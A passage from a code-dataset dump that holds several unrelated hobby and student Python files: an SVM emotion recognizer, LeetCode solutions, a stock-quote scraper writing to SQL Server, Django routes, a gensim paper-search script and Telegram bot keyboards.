files[-int(len(files)*0.2):] #get last 20% of file list\n return training, prediction\n\n\ndef getSlicedData(emotion):\n\n files = glob.glob(dir1+\"\\\\\"+emotion+\"\\*\")\n #random.shuffle(files)\n training = files[:int(len(files))] #full data\n return training\n\n\ndef getLandmarks(image): #Function to detect landmarks in image\n\n landmarks_Vector=[]\n xList=[]\n yList=[]\n\n detections =detector(image,1) #Detect\n\n for k,d in enumerate(detections):\n\n shape = predictor(image,d)\n for i in range(1,68):\n xList.append(float(shape.part(i).x))\n yList.append(float(shape.part(i).y))\n\n xmean = np.mean(xList) #Calculate mean for the both co-ordinates\n ymean = np.mean(yList)\n xcentral = [(x - xmean) for x in xList] #Taking distance from the center\n ycentral = [(y-ymean) for y in yList]\n\n for x,y,w,z in zip(xcentral,ycentral,xList,yList):\n\n landmarks_Vector.append(w)\n landmarks_Vector.append(z)\n meannp=np.asarray((ymean,xmean))\n coorp = np.asarray((z,w))\n dist = np.linalg.norm(coorp-meannp) #Square root representation\n\n landmarks_Vector.append(dist)\n landmarks_Vector.append((math.atan2(y, x)*360)/(2*math.pi)) #Angle method\n\n\n\n return landmarks_Vector\n\n\n#for generating the generateModel\ndef generateModel():\n\n training_data = []\n training_labels = []\n\n for emotion in emotions:\n\n\n files=getSlicedData(emotion)\n for item in files:\n image = cv2.imread(item)\n gray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\n clahe_image = clahe.apply(gray)\n landmarks_Vector=getLandmarks(clahe_image)\n if landmarks_Vector:\n training_data.append(landmarks_Vector)\n training_labels.append(emotions.index(emotion))\n print ('Length {0} and Size {1}'.format(len(training_data),sys.getsizeof(training_data)))\n print ('Length {0} and Size {1}'.format(len(training_labels),sys.getsizeof(training_labels)))\n\n clf = SVC(kernel='linear', probability=True, tol=1e-3)\n training_data = np.array(training_data)\n training_labels = np.array(training_labels)\n\n clf.fit(training_data,training_labels)\n filename='F:\\Chaos\\EmotionRecognition\\Application\\model\\\\raw\\\\svmModel_full.sav'\n pickle.dump(clf, open(filename, 'wb'))\n\n\n#for predicting the svmModel\n\ndef predict_Particular():\n\n filename='F:\\Chaos\\EmotionRecognition\\Application\\model\\\\raw\\\\svmModel_full.sav'\n loaded_model = pickle.load(open(filename, 'rb'))\n\n\n for emotion in new_emotions:\n\n prediction_data = []\n prediction_labels = []\n\n for file in glob.glob(dir2+\"\\\\\"+emotion+\"\\*\"):\n\n image = cv2.imread(file)\n gray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\n clahe_image = clahe.apply(gray)\n landmarks_Vector=getLandmarks(clahe_image)\n if landmarks_Vector:\n prediction_data.append(landmarks_Vector)\n prediction_labels.append(emotions.index(emotion))\n print ('Expected {0} ,Got {1}'.format(emotion,emotions[loaded_model.predict([landmarks_Vector])]))\n\n\n prediction_data = np.array(prediction_data)\n prediction_labels = np.array(prediction_labels)\n pred_score = loaded_model.score(prediction_data,prediction_labels)\n print ('{0} Prediction Score {1}'.format(emotion,pred_score))\n\ndef get_Data(): # Function to return all data\n\n training_data = []\n training_labels = []\n prediction_data = []\n prediction_labels = []\n original_test=[]\n\n for emotion in new_emotions:\n\n training, prediction = shuffle_files(emotion)\n #Append data to training and prediction list, and generate labels 0-7\n for item in training:\n image = cv2.imread(item)\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n clahe_image = clahe.apply(gray)\n landmarks_Vector=getLandmarks(clahe_image)\n if landmarks_Vector:\n training_data.append(landmarks_Vector)\n training_labels.append(new_emotions.index(emotion))\n\n for item in prediction:\n\n image = cv2.imread(item)\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n clahe_image = clahe.apply(gray)\n landmarks_Vector=getLandmarks(clahe_image)\n if landmarks_Vector:\n original_test.append(image)\n prediction_data.append(landmarks_Vector)\n prediction_labels.append(new_emotions.index(emotion))\n\n\n return training_data, training_labels, prediction_data, prediction_labels,original_test\n\ndef applySVM():\n\n clf = SVC(kernel='linear', probability=True, tol=1e-3)#, verbose = True) #Set the classifier as a support vector machines with polynomial kernel\n\n accuracy_List=[]\n highestScore = 0.0\n final_prediction_label=[]\n final_prediction_result=[]\n final_prediction_image=[]\n\n for i in range(0,10):\n\n training_data, training_labels, prediction_data, prediction_labels,original_test = get_Data()\n print ('Train data length ={0} , Test data length ={1}'.format(len(training_data),len(prediction_data)))\n\n npar_train = np.array(training_data)\n npar_trainlabels = np.array(training_labels)\n\n clf.fit(npar_train,npar_trainlabels)\n npar_pred=np.array(prediction_data)\n pred_result=clf.predict(npar_pred)\n pred_score = clf.score(npar_pred,prediction_labels)\n if (pred_score > highestScore):\n highestScore = pred_score\n final_prediction_label=prediction_labels\n final_prediction_result=pred_result\n final_prediction_image=original_test\n print ('Score {0}'.format(pred_score))\n accuracy_List.append(pred_score)\n\n print ('Mean-Accuracy {0}, Highest-Score {1}'.format(np.mean(accuracy_List),highestScore))\n for i in range(len(final_prediction_result)):\n cv2.imwrite(os.path.join(dest,new_emotions[final_prediction_label[i]],new_emotions[final_prediction_result[i]]+str(i)+'.jpg'),final_prediction_image[i])\n\n\napplySVM()\n#generateModel() #for generating the model\n#predict_Particular() #for predicting the model\n","repo_name":"shashank-13/Emotion-Recognition","sub_path":"Application/test_Landmark.py","file_name":"test_Landmark.py","file_ext":"py","file_size_in_byte":7586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"44588480680","text":"class Solution:\n def findRepeatedDnaSequences(self, s: str) -> List[str]:\n current = s[:10]\n seen_patterns = set([current])\n output = set([])\n for i in range(10,len(s)):\n current = current[1:]+s[i]\n if(current in seen_patterns):\n output.add(current)\n else:\n seen_patterns.add(current)\n return output\n","repo_name":"Protype8/LeetCode","sub_path":"Arrays & Hashing/Repeated DNA Sequences - LeetCode.py","file_name":"Repeated DNA Sequences - LeetCode.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38005622878","text":"T = int(input())\nTarr = []\nans = []\ncount = 0\nfor i in range(T):\n Tarr.append(list(map(int, input().split())))\n Tarr[i].append(list(map(int, input().split())))\n\nfor arr in Tarr:\n Max = max(arr[2])\n while arr[1] != -1:\n if arr[2][0] == Max:\n if arr[1] == 0:\n ans.append(count + 1)\n count = 0\n arr[1] = -1\n else:\n arr[2].pop(0)\n arr[1] -= 1\n count += 1\n Max = max(arr[2])\n else:\n if arr[1] == 0:\n arr[2] = arr[2][1:] + arr[2][:1]\n arr[1] = len(arr[2]) - 1\n else:\n arr[2] = arr[2][1:] + arr[2][:1]\n arr[1] -= 1\n\nfor i in ans:\n print(i)\n ","repo_name":"witoru/many_things","sub_path":"boj/1966.py","file_name":"1966.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36391558318","text":"import os\nfrom typing import Dict\n\nfrom scipy.interpolate import interp1d\n\n\ndef get_available_city_files():\n \"\"\"\n Récupère les fichiers disponibles pour les villes.\n \"\"\"\n filenames = os.listdir('src/assets')\n filenames = list(filter(lambda f: f.endswith('.gif'), filenames))\n\n def get_size(name: str):\n name = name.split('_')[-1]\n name = name.split('.')[0]\n\n width, height = name.split('x')\n return int(width), int(height)\n\n return list(map(lambda f: ({\n \"filename\": f,\n \"label\": 'x'.join(list(map(str, get_size(f)))), \"width\": get_size(f)[0],\n \"height\": get_size(f)[1]\n }), filenames))\n\n\ndef parse_cities(path: str):\n \"\"\"\n Récupère les données associées aux villes du fichier au chemin donné dans les paramètres.\n\n :param path: Le chemin du fichier à parser.\n \"\"\"\n with open(path, 'r') as file:\n villes_coords = {}\n\n for line in file:\n name = line[:30].strip()\n lat = line[30:36]\n lng = line[53:63]\n\n villes_coords[name] = {\"lat\": float(lat), \"lng\": float(lng)}\n\n villes_coords[\"NorthWest\"] = ({\"lat\": 52, \"lng\": -5.5})\n villes_coords[\"SouthEst\"] = ({\"lat\": 41, \"lng\": 10.5})\n\n return villes_coords\n\n\ndef get_min_max_lat_lng(cities: list[Dict[str, int]]):\n \"\"\"\n Retourne le minimum et le maximum de la latitude et de la longitude.\n\n :param cities: La liste des villes (dictionnaires avec lat et lng)\n \"\"\"\n lats = list(map(lambda c: c[\"lat\"], cities.values()))\n lngs = list(map(lambda c: c[\"lng\"], cities.values()))\n\n min_lat = min(lats)\n max_lat = max(lats)\n min_lng = min(lngs)\n max_lng = max(lngs)\n\n return min_lat, max_lat, min_lng, max_lng\n\n\ndef is_valid(cities, lat: float, lng: float) -> bool:\n \"\"\"\n Vérifie que les coordonnées passées en paramètres sont valides.\n\n :param cities: La liste des villes (dictionnaires avec lat et lng)\n :param lat: La latitude des coordonnées.\n :param lng: Lat longitude des coordonnées.\n \"\"\"\n min_lat, max_lat, min_lng, max_lng = get_min_max_lat_lng(cities)\n return min_lat <= lat <= max_lat and min_lng <= lng <= max_lng\n\n\ndef get_cities_as_coordinates(cities, width: int, height: int) -> dict:\n \"\"\"\n Retourne la liste des villes avec les coordonnées (x et y) associés à la carte.\n\n :param cities: La liste des villes (dictionnaires avec lat et lng)\n :param width: La largeur de la canvas.\n :param height: La hauteur de la canvas.\n \"\"\"\n min_lat, max_lat, min_lng, max_lng = get_min_max_lat_lng(cities)\n\n scale_y = interp1d([min_lat, max_lat], [width, 0])\n scale_x = interp1d([min_lng, max_lng], [0, height])\n\n for city, coords in cities.items():\n y = scale_y(coords[\"lat\"])\n x = scale_x(coords[\"lng\"])\n\n cities[city] = {\"x\": x, \"y\": y, **coords}\n\n return cities\n","repo_name":"ctrl-plus-w/esaip-project-villes","sub_path":"src/utils/parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":2894,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10021482938","text":"from django.urls import include, path\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.contrib.auth import views as auth_views\n\nfrom . import views\n\napp_name = 'games'\nurlpatterns = [\n path('', views.IndexView, name='index'),\n path('global/', views.GlobalIndexView, name='gindex'),\n path('genre/<int:genre_id>/', views.GenreView, name='genre'),\n path('genre/<int:genre_id>/<str:name>/', views.GenreView, name='genre'),\n path('tag/<int:tag_id>/', views.GamesTaggedWithView, name='tag'),\n path('tag/<int:tag_id>/<str:name>/', views.GamesTaggedWithView, name='tag'),\n path('collection/<int:col_id>/', views.GamesInCollectionView, name='collection'),\n path('collection/<int:col_id>/<str:name>/', views.GamesInCollectionView, name='collection'),\n path('customlist/<int:list_id>/', views.GamesInCustomListView, name='customlist'),\n path('platform/<int:pk>/', views.PlatformView.as_view(), name='platform'),\n path('platform/<int:pk>/<str:name>/', views.PlatformView.as_view(), name='platform'),\n path('game/<int:game_id>/', views.GameView, name='game'),\n path('game/<int:game_id>/<str:name>/', views.GameView, name='game'),\n path('game/<int:game_id>/<str:name>/<str:tab>/', views.GameView, name='game'),\n path('user/<int:user_id>/', views.ProfileView, name='profile'),\n path('user/<int:user_id>/<str:name>/', views.ProfileView, name='profile'),\n path('user/<int:user_id>/<str:name>/<str:tab>/', views.ProfileView, name='profile'),\n path('login/', auth_views.LoginView.as_view(template_name='games/login.html'), name='login'),\n path('register/', views.register, name='register'),\n path('gamelist/', views.GameListView, name='gamelist'),\n path('gamelist/random', views.GameListRandomView, name='gamelistrandom'),\n path('gamelist/export', views.GameListExportView, name='gamelistexport'),\n path('gamelist/<str:edit_type>', views.GameListView, name='gamelist'),\n path('gamelist/<str:edit_type>/<int:entry_id>', views.GameListView, name='gamelist'),\n path('browse/', views.BrowseView, name='browse'),\n path('browse/collection/', views.BrowseCollectionView, name='browsecollection'),\n path('browse/users/', views.BrowseUserView, name='browseusers'),\n path('better/', views.BetterView, name='better'),\n path('better/<str:better_type>/', views.BetterView, name='better'),\n path('notifications/', views.NotificationsView, name='notifications'),\n path('notifications/<str:action>/', views.NotificationsView, name='notifications'),\n path('recommendations/', views.RecommendationsView, name='recommendations'),\n path('recommendations/view/<int:user_id>', views.RecommendationsView, name='recommendations'),\n path('recommendations/refresh/', views.RecommendationsRefreshView, name='recrefresh'),\n path('game/ignore/<int:game_id>/', views.IgnoreGameView, name='ignore'),\n path('game/addtag/<int:game_id>/', views.TagAdditionRequestView, name='tagreq'),\n path('game/rateaspect/', views.RateAspectView, name='rateaspect'),\n path('user/follow/<int:user_id>/', views.FollowUserView, name='follow'),\n path('status/like/', views.LikeStatusView, name='likestatus'),\n path('status/like/<int:status_id>/', views.LikeStatusView, name='likestatus'),\n path('status/delete/<int:status_id>/', views.DeleteStatusView, name='deletestatus'),\n path('settings/', views.SettingsView, name='settings'),\n path('settings/avatar/', views.ChangeAvatarView, name='changeavatar'),\n path('settings/ignoredtags/', views.ChangeIgnoredTagsView, name='changeignoredtags'),\n path('settings/customlists/', views.ChangeCustomListsView, name='changecustomlists'),\n path('settings/customlists/add', views.AddCustomListView, name='addcustomlist'),\n path('settings/customlists/delete/<int:list_id>/', views.DeleteCustomListView, name='deletecustomlist'),\n path('settings/customlists/edit/<int:list_id>/', views.EditCustomListView, name='editcustomlist'),\n path('settings/platforms/', views.HidePlatformsView, name='hideplatforms'),\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","repo_name":"Hexadigital/mygamelist","sub_path":"mygamelist/games/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4123,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"70150270842","text":"# %%\n# import pandas_datareader.data as web\nfrom bs4 import BeautifulSoup as bs\n# import ssl\nimport pandas as pd\nimport requests as rs\nfrom selenium import webdriver\nfrom selenium.webdriver import Firefox\nfrom selenium.webdriver.firefox.options import Options\nfrom selenium.webdriver.chrome.options import Options\nimport time\nimport glob\nimport pyodbc\nimport os\n# from tkinter import *\n# import tkinter.filedialog\n# from tkinter import messagebox\n\n\n# %%\n\n# navegador = webdriver.Firefox(executable_path='./geckodriver.exe')\n# navegador.set_preference(\"browser.privatebrowsing.autostart\", True)\n# firefox_options = Options()\n# firefox_options.add_argument(\"--headless\")\n# navegador.maximize_window()\n# agente = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36'\n# headers = {'User-Agent': agente}\n\n\n# %%\n\nchrome_options = Options()\nchrome_options.add_argument(\"--headless\")\nnavegador = webdriver.Chrome(chrome_options=chrome_options)\nnavegador.maximize_window()\nagente = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36'\nheaders = {'User-Agent': agente}\n\n\n# %%\n# percorre a requisição e captura o html de cada pagina\n# dataframe vindo da planilha de empresas.\nempresas_df = pd.read_excel('EmpresasInfomoney.xlsx')\nurl = \"https://www.infomoney.com.br/cotacoes/\"\ntabelaResul = []\ncontador = 0\nwhile (contador < len(empresas_df)):\n for empresa in empresas_df[\"Empresas\"]:\n url_nv = ''.join([url, empresa, '/historico/'])\n # print(empresa)\n navegador.get(url_nv)\n time.sleep(5)\n conteudo = rs.get(url_nv, headers=headers)\n time.sleep(3)\n # encontra o elemento da pagina e grava na memoria os dados da tabela.\n tb_din = navegador.find_element_by_xpath(\n '//*[@id=\"quotes_history\"]').get_attribute('outerHTML')\n sigla_html = navegador.find_element_by_xpath(\n '/html/body/div[4]/div/div[1]/div[1]/div/div[1]/h1')\n # , index_col=\"DATA\" incluir após thousands para colocar a data como indice.\n pd_html = pd.read_html(tb_din, decimal=',', thousands='.')\n df = pd.DataFrame(pd_html[0])\n df['EMPRESA'] = sigla_html.text\n time.sleep(3)\n tabelaResul.append(df.head(1))\n contador += 1\n time.sleep(3)\n\n\n# %%\n# \nurl_cxco11 = \"https://www.infomoney.com.br/cotacoes/fundos-imobiliarios-cxco11/\"\nEmpresa_cx = ''\nnavegador.get(url_cxco11)\n\ncx_fechamento = navegador.find_element_by_xpath(\n '/html/body/main/section/div/div/div[1]/div[2]/div[1]/span[1]').get_attribute('outerHTML')\ncx_sigla_html = navegador.find_element_by_xpath(\n '/html/body/main/section/div/div/div[1]/div[1]/div/h1').get_attribute('outerHTML')\ncx_fechamento_bs = bs(cx_fechamento, parser='html.parser')\ncx_sigla = bs(cx_sigla_html, parser='html.parser')\n\ncx_data_df = pd.DataFrame(tabelaResul[0])\ncx_data_df['DATA']\n\ncxco11_list1 = pd.Series(cx_data_df['DATA'])\ncxco11_list2 = pd.Series(float(cx_fechamento_bs.text.replace(\",\", \".\")), name='FECHAMENTO')\ncxco11_list3 = pd.Series(cx_sigla.text, name='EMPRESA')\n\ndf_cxco11 = pd.concat([cxco11_list1, cxco11_list2, cxco11_list3], axis=1)\n\ndf_cxco11.to_excel(f'acoesfiltradas/cxco1.xlsx',\n columns=['DATA', 'FECHAMENTO', 'EMPRESA'], index=False)\n\n\n# %%\ndef criar_plans_filtradas():\n acoes_tratadas = []\n for i in range(len(empresas_df)):\n pdf = pd.DataFrame(tabelaResul[i].head(2), columns=None)\n acoes_tratadas.append(pdf[['DATA', 'FECHAMENTO', 'EMPRESA']])\n acoesfiltradas = pdf.to_excel(f'acoesfiltradas/acoesfiltradas{i}.xlsx', columns=[\n 'DATA', 'FECHAMENTO', 'EMPRESA'], index=False)\n\n\n# %%\ndados_historicos = pd.DataFrame()\n\n\ndef juntar_planilhas():\n dados_historicos = pd.DataFrame()\n dados = glob.glob('acoesfiltradas\\*.xlsx')\n dados_historicos += dados_historicos\n for i in dados:\n tabela = pd.read_excel(i)\n dados_historicos = pd.concat(\n [dados_historicos, tabela], axis=0, ignore_index=True)\n dados_historicos.to_excel('./acoesfiltradas.xlsx', index=False)\n\n\n# %%\n# prepara_sql = pd.read_excel('./acoesfiltradas.xlsx')\n\n# %%\ndef SQLInserirDados(TabelaRecebeDados):\n prepara_sql = pd.read_excel('./acoesfiltradas.xlsx')\n dados_historicos = prepara_sql\n try:\n\n cnxn = pyodbc.connect('Trusted_Connection=yes',\n driver='{SQL Server}',\n server='LEANDROPC\\SQLDEVELOPER2019',\n database='ACOESINFO')\n\n cursor = cnxn.cursor()\n # Insert Dataframe into SQL Server:\n for index, row in dados_historicos.iterrows():\n cursor.execute(\"INSERT INTO [ACOESINFO].[dbo].[ACOESINFOMONEY] ( [DATA],[FECHAMENTO],[EMPRESA]) values(?,?,?)\",\n row.DATA, row.FECHAMENTO, row.EMPRESA)\n\n cnxn.commit()\n print(\"Inserindo dados\")\n except ConnectionError as e:\n print(\"Erro de conexão: \", e)\n\n finally:\n\n cursor.close()\n cnxn.close()\n\n\n# %%\ndef selectDatdos(consultar):\n\n try:\n connStr = pyodbc.connect('Trusted_Connection=yes',\n driver='{SQL Server}',\n server='LEANDROPC\\SQLDEVELOPER2019',\n database='ACOESINFO')\n\n saida = pd.read_sql(consultar, connStr)\n return saida\n print(\"consultando\")\n except ConnectionError as e:\n print(\"Erro de conexão: \", e)\n\n\n# %%\n\n\ncriar_plans_filtradas()\ntime.sleep(0.1)\njuntar_planilhas()\ntime.sleep(0.1)\nnavegador.quit()\n\n\n# %%\nSQLInserirDados('[ACOESINFO].[dbo].[ACOESINFOMONEY]')\ntime.sleep(0.1)\nselectDatdos(consultar=\"select * FROM [ACOESINFO].[dbo].[ACOESINFOMONEY]\")","repo_name":"leandromartins36/acoes_nv","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5809,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73723653239","text":"T = int(input())\n\nfor tc in range(1,T+1):\n N = int(input())\n li = []\n for _ in range(N):\n temp = list(map(int,input().split()))\n temp = list(map(lambda x: x/100, temp))\n li.append(temp)\n\n res = 0\n\n p = list(range(N))\n\n stack = [[[x], li[0][x]] for x in p]\n\n M = 0\n while stack:\n perm, prob= stack.pop()\n\n if len(perm) == len(li):\n if prob > M :\n M = prob\n else:\n for i in p:\n if i not in perm:\n if prob * li[len(perm)][i] <= M :\n continue\n else:\n stack.append((perm+[i], prob * li[len(perm)][i]))\n\n print(f'#{tc}',end=' ')\n print(\"{:.6f}\".format(M*100))","repo_name":"hhhhjjj11/TIL","sub_path":"알고시간2/3월30일/과제.py","file_name":"과제.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11763096479","text":"@app.route(\"/quotes/<int:id>\", methods=['DELETE'])\ndef delete(id):\n connection = get_db()\n cursor = connection.cursor()\n quote_db = cursor.fetchone()\n cursor.execute(quote_db)\n connection.commit()\n quotes = []\n keys = [\"id\", \"author\", \"text\"]\n quote = dict(zip(keys, quote_db))\n quotes.append(quote)\n for quote in quotes:\n if id == quote['id']:\n quotes.remove(quote)\n return f\"Quote with id {id} is deleted.\", 200\n abort(404, f\"Указанного id= {id}, не существует\")","repo_name":"ArsTheProgammer/for_homeworks","sub_path":"delete_separate_file_hw.py","file_name":"delete_separate_file_hw.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12276453390","text":"\"\"\"\nGiven a collection of numbers that might contain duplicates, return all possible unique permutations.\n\nExample:\n\nInput: [1,1,2]\nOutput:\n[\n [1,1,2],\n [1,2,1],\n [2,1,1]\n]\n\n\"\"\"\nclass Solution:\n def permuteUnique(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n \"\"\"\n def dfs(nums, cur, used, ret):\n if len(cur)==len(nums):\n ret.append(cur)\n return\n pre = None\n for i in range(len(nums)):\n if not used[i]:\n if pre is None or pre!=nums[i]:\n used[i] = True\n dfs(nums, cur+[nums[i]], used, ret)\n pre = nums[i]\n used[i] = False\n\n nums.sort()\n ret = []\n if len(nums)==0:\n return ret\n dfs(nums, [], [False]*len(nums), ret)\n return ret\n\n\nclass Solution2:\n def permuteUnique(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n \"\"\"\n def dfs(n, arr, cur, ret):\n if len(cur)==n:\n ret.append(cur)\n return\n for i in range(len(arr)):\n if arr[i][1]:\n arr[i][1] -= 1\n dfs(n, arr, cur+[arr[i][0]],ret)\n arr[i][1] += 1\n\n n = len(nums)\n counter = collections.Counter(nums)\n arr = list(map(list,counter.items()))\n ret = []\n for i in range(len(arr)):\n arr[i][1] -= 1\n dfs(n, arr, [arr[i][0]],ret)\n arr[i][1] += 1\n return ret\n","repo_name":"ellinx/LC-python","sub_path":"PermutationsII.py","file_name":"PermutationsII.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40632128126","text":"# Write your angular_dist function here.\nimport numpy as np\n\ndef angular_dist(ra1, dec1, ra2, dec2):\n d1 = np.radians(dec1)\n d2 = np.radians(dec2)\n r1 = np.radians(ra1)\n r2 = np.radians(ra2)\n b = np.cos(d1)*np.cos(d2)*np.sin(np.abs(r1 - r2)/2)**2\n a = np.sin(abs(d1 - d2)/2)*np.sin(abs(d1 - d2)/2)\n d = 2*np.arcsin(np.sqrt(a + b))\n return np.degrees(d)\n\n# You can use this to test your function.\n# Any code inside this `if` statement will be ignored by the automarker.\nif __name__ == '__main__':\n # Run your function with the first example in the question.\n print(angular_dist(21.07, 0.1, 21.15, 8.2))\n\n # Run your function with the second example in the question\n print(angular_dist(10.3, -3, 24.3, -29))\n\n","repo_name":"rugggg/astro_data","sub_path":"week2/angles.py","file_name":"angles.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42670723037","text":"from gensim import corpora, models, similarities, models\nimport glob\nimport re\n\nfrom cStringIO import StringIO\nexpr = re.compile(\"([^\\w\\xe9-\\xf8'\\s])\", re.UNICODE)\n\nfolders = [\n \"/home/mehdi/A Lire/info/papers/ML\"\n]\n\ndef to_words(fd):\n lines = []\n for line in fd.readlines():\n line = line.decode(\"utf8\")\n line = line[:-1]\n line = expr.sub(r\" \\1 \", line, re.UNICODE)\n line = line.lower()\n line = line.split()\n line = [word.strip() for word in line]\n lines.append(line)\n words = [word for line in lines for word in line]\n return words\n\nclass MyCorpus(object):\n def __init__(self, filenames):\n self.filenames = filenames \n def __iter__(self):\n for filename in self.filenames:\n fd = open(filename)\n words = to_words(fd)\n fd.close()\n yield words\n\n\nimport os\nimport subprocess\nimport re\ndef findfiles(dir, pattern):\n patternregex = re.compile(pattern)\n for root, dirs, files in os.walk(dir):\n for basename in files:\n filename = os.path.join(root, basename)\n if patternregex.search(filename, re.IGNORECASE):\n yield filename\n\ndef generate_txt_all(folder):\n for filename in findfiles(folder, \"\\.pdf$\"):\n generate_txt(filename)\n\ndef generate_txt(filename):\n subprocess.call([\"pdftotext\", filename], cwd=os.path.join(os.getenv(\"HOME\"), \".papers\"))\n\nif __name__ == \"__main__\":\n\n import sys\n action = sys.argv[1]\n folder = os.path.join(os.getenv(\"HOME\"), \".papers\")\n filenames = list(glob.glob(folder + \"/*.txt\"))\n filenames = sorted(filenames)\n\n if action == \"gentext\":\n for folder in folders:\n generate_txt_all(folder)\n elif action == \"buildmodel\":\n corpus = MyCorpus(filenames)\n dictionary = corpora.Dictionary(corpus)\n dictionary.save(folder + \"/dictionary\")\n corpus = [dictionary.doc2bow(doc) for doc in corpus]\n corpora.MmCorpus.serialize(os.path.join(folder, \"corpus\"), corpus)\n corpus = corpora.MmCorpus(os.path.join(folder, \"corpus\"))\n model = models.LdaModel(corpus, id2word=dictionary, num_topics=200)\n index = similarities.MatrixSimilarity(model[corpus])\n model.save(folder + \"/model\")\n index.save(folder + \"/index\")\n elif action == \"query\":\n corpus = corpora.MmCorpus(folder + \"/corpus\")\n model = models.LsiModel.load(folder + \"/model\")\n index = similarities.MatrixSimilarity.load(folder + \"/index\")\n dictionary = corpora.Dictionary.load(folder + \"/dictionary\")\n query = sys.argv[2]\n if len(sys.argv) >= 4:\n top = int(sys.argv[3])\n else:\n top = 1\n query = model[dictionary.doc2bow(to_words(StringIO(query)))]\n response = index[query]\n rank = sorted(range(len(corpus)), key=lambda k:response[k], reverse=True)\n\n rank_filenames = (map(lambda k:filenames[k], rank))\n response = rank_filenames[top - 1]\n print(response)\n for folder in folders:\n for filename in findfiles(folder, \"\\.pdf$\"):\n if(os.path.basename(filename).split(\".\")[0] == \n os.path.basename(response).split(\".\")[0]):\n subprocess.call([\"evince\", filename])\n break\n","repo_name":"mehdidc/fun","sub_path":"py/papers.py","file_name":"papers.py","file_ext":"py","file_size_in_byte":3333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74309039160","text":"from telebot import types\n\n\ndef main_keyboard():\n keyboard = types.ReplyKeyboardMarkup(True, True)\n keyboard.row('🗓️ Расписание/Мастер-классы')\n keyboard.row('🍽️ Питание', '🔔 Услуги')\n keyboard.row('❇ Акции и скидки', '🌐 Связь с нами')\n return keyboard\n\n\ndef food_keyboard():\n keyboard = types.ReplyKeyboardMarkup(True, True)\n keyboard.row('🍽️ Рестораны', '🍸 Бары')\n keyboard.row('🌭 Снек-бары', '🍨 Детям')\n keyboard.row('🔙 Назад')\n return keyboard\n\n\ndef schedule_keyboard():\n keyboard = types.ReplyKeyboardMarkup(True, True)\n keyboard.row('🎆 Вечерние мероприятия')\n keyboard.row('😎 Teen-club', '🥗 Кулинарный мастер-класс')\n keyboard.row('🎥 Cinema-academy', '🤸 Fitness-academy')\n keyboard.row('🔙 Назад')\n return keyboard\n\n\ndef contacts_keyboard():\n keyboard = types.InlineKeyboardMarkup()\n keyboard.row_width = 1\n keyboard.add(\n types.InlineKeyboardButton('🔗 Instagram', 'https://www.instagram.com/doville__animation/'),\n types.InlineKeyboardButton('🔗 ВКОНТАКТЕ', 'https://vk.com/dovilleanimation_club'),\n )\n return keyboard\n\n\ndef services_keyboard():\n keyboard = types.InlineKeyboardMarkup()\n keyboard.row_width = 2\n keyboard.add(\n types.InlineKeyboardButton('🛍️ Магазины', 'https://dovilleresort.ru/about/services/magazini/'),\n types.InlineKeyboardButton('💼 Консьерж', 'https://dovilleresort.ru/about/services/consierge/'),\n types.InlineKeyboardButton('🥘 Рум-сервис', 'https://dovilleresort.ru/about/services/room-service/'),\n types.InlineKeyboardButton('🅿️ Парковка', 'https://dovilleresort.ru/about/services/parking/'),\n )\n return keyboard\n\n\ndef teen_club_keyboard():\n keyboard = types.InlineKeyboardMarkup()\n keyboard.row_width = 1\n keyboard.add(\n types.InlineKeyboardButton('Перейти ➡️', 'https://vk.com/public204655046'),\n )\n return keyboard\n\n\ndef cook_masterclass_keyboard():\n keyboard = types.InlineKeyboardMarkup()\n keyboard.row_width = 1\n keyboard.add(\n types.InlineKeyboardButton('Перейти ➡️', 'https://www.instagram.com/stanislavkalinovskiy/'),\n )\n return keyboard\n\n\ndef fedorova_keyboard():\n keyboard = types.InlineKeyboardMarkup()\n keyboard.row_width = 1\n keyboard.add(\n types.InlineKeyboardButton('Принять участие ➡️',\n 'https://c.cloudpayments.ru/payments/7e8d475280974ced8aca998d76a93d60',\n callback_data='fedorova'),\n )\n return keyboard\n","repo_name":"igor-kushnarenko/telebot","sub_path":"scripts/keyboards.py","file_name":"keyboards.py","file_ext":"py","file_size_in_byte":2799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30858925118","text":"import logging\n\nimport pandas\nfrom pandas import DataFrame\nimport re\n\nLOGGER = 